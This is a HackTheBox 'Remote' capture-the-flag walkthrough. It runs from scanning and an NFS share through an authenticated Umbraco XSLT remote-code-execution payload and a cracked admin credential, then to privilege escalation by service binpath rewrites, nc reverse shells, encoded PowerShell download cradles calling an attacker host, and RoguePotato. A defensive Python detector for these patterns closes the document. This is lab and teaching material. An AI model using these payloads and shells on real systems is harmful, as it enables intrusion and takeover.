HackTheBox - Remote

Nmap scan results

nmap -p- -A -T4 -oA nmap-remote 10.10.10.180

Let's enumerate the FTP server and see if we can get any sensitive or configuration files.

Epic Fail

Enumerating the web server (Microsoft HTTPAPI)

There's an Umbraco CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.

Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft-based infrastructure.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50

There are certain exploits available for this CMS, but first we need to identify the version in use.

Mounting the NFS Share

NFS, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or share files on a remote computer as though it were a local computer.

mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock

Umbraco stores its data, including the usernames and password hashes, in the Umbraco.sdf file. The file is located at App_data/Umbraco.sdf.

I actually ran strings on the Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used: check the Web.config file.

Get the SHA-1 hash for admin and crack it using John or hashcat.

Now that we have credentials, we can try the authenticated Remote Code Execution exploit.

Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
  <msxsl:script language="C#" implements-prefix="csharp_user">
    // the cmd and cmd-arguments placeholders are substituted by the exploit script before the payload is sent
    public string xml()
    {
        string cmd = "<cmd-arguments>";
        System.Diagnostics.Process proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "<cmd>";
        proc.StartInfo.Arguments = cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        string output = proc.StandardOutput.ReadToEnd();
        return output;
    }
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="csharp_user:xml()"/>
  </xsl:template>
</xsl:stylesheet>

Using Nishang's PowerShell script to get a reverse shell

python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"

Running winpeas.exe (Privilege Escalation)

certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe

If the group "Authenticated Users" has SERVICE_ALL_ACCESS on a service, then it can modify the binary path that the service executes. To modify it and execute nc you can do:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc

Trying the RoguePotato attack

Download the exploit from here and transfer it to the target machine using certutil.exe

certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe

The exploit doesn't work without a CLSID; the CLSID for the UsoSvc service can be obtained from here.

A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
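From the defender's side, the service reconfiguration above and the RoguePotato launch leave the same two traces in process-creation telemetry: sc.exe rewriting a binPath, and a PowerShell -EncodedCommand / -Enc argument. The Python below is an added example, not part of the original write-up: it runs over constructed Sysmon-style records, flags both patterns, and decodes the encoded argument (the same base64 blob as above, which is UTF-16LE rather than UTF-8) so an analyst sees the real command. The record shape, account names and parent images are assumptions.

```python
import base64
import re

# The encoded blob from the write-up: base64 over UTF-16LE text (trailing newline included).
ENC_BLOB = ("SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
            "ZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEA"
            "NAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA")

# Constructed Sysmon-style process-creation records (user, parent image, command line):
# the UsoSvc reconfiguration, the RoguePotato launch, then two benign admin commands.
SAMPLE_EVENTS = [
    ("IIS APPPOOL\\DefaultAppPool", "w3wp.exe",  # account and parent names are assumed
     f'sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand {ENC_BLOB}"'),
    ("IIS APPPOOL\\DefaultAppPool", "cmd.exe",
     f'RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc {ENC_BLOB}" -l 9999'),
    ("NT AUTHORITY\\SYSTEM", "services.exe", "sc.exe query UsoSvc"),
    ("CONTOSO\\admin", "explorer.exe", "powershell.exe -NoProfile -Command Get-Date"),
]

# sc / sc.exe rewriting a service's binPath (the service's ImagePath registry value changes too).
SC_BINPATH = re.compile(r"\bsc(?:\.exe)?\s+config\s+(\S+)\s+binpath=", re.I)
# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the argument is base64.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")

def analyse(event):
    user, parent, cmdline = event
    findings = []  # empty list means nothing of interest in this record
    if m := SC_BINPATH.search(cmdline):
        findings.append(f"service binPath rewritten with sc: {m.group(1)}")
    if m := ENC_FLAG.search(cmdline):
        try:
            decoded = decode_encoded_command(m.group(1)).strip()
        except (ValueError, UnicodeDecodeError):
            decoded = "<not valid base64/UTF-16LE>"
        findings.append(f"encoded PowerShell decodes to: {decoded}")
    if findings and (user.upper().startswith("IIS APPPOOL") or parent.lower() == "w3wp.exe"):  # web-server context is the strongest signal
        findings.append("runs in the IIS application pool context (post-exploitation of the CMS)")
    return findings

def scan(events):
    """Return [(command line, findings)] for every record that raised a finding."""
    return [(e[2], f) for e in events if (f := analyse(e))]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(cmdline[:60] + " ...", *findings, sep="\n   ")
```

The same two regexes map directly onto a SIEM rule over Sysmon Event ID 1 command lines; the decode step is what turns an opaque blob into something triage can act on.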
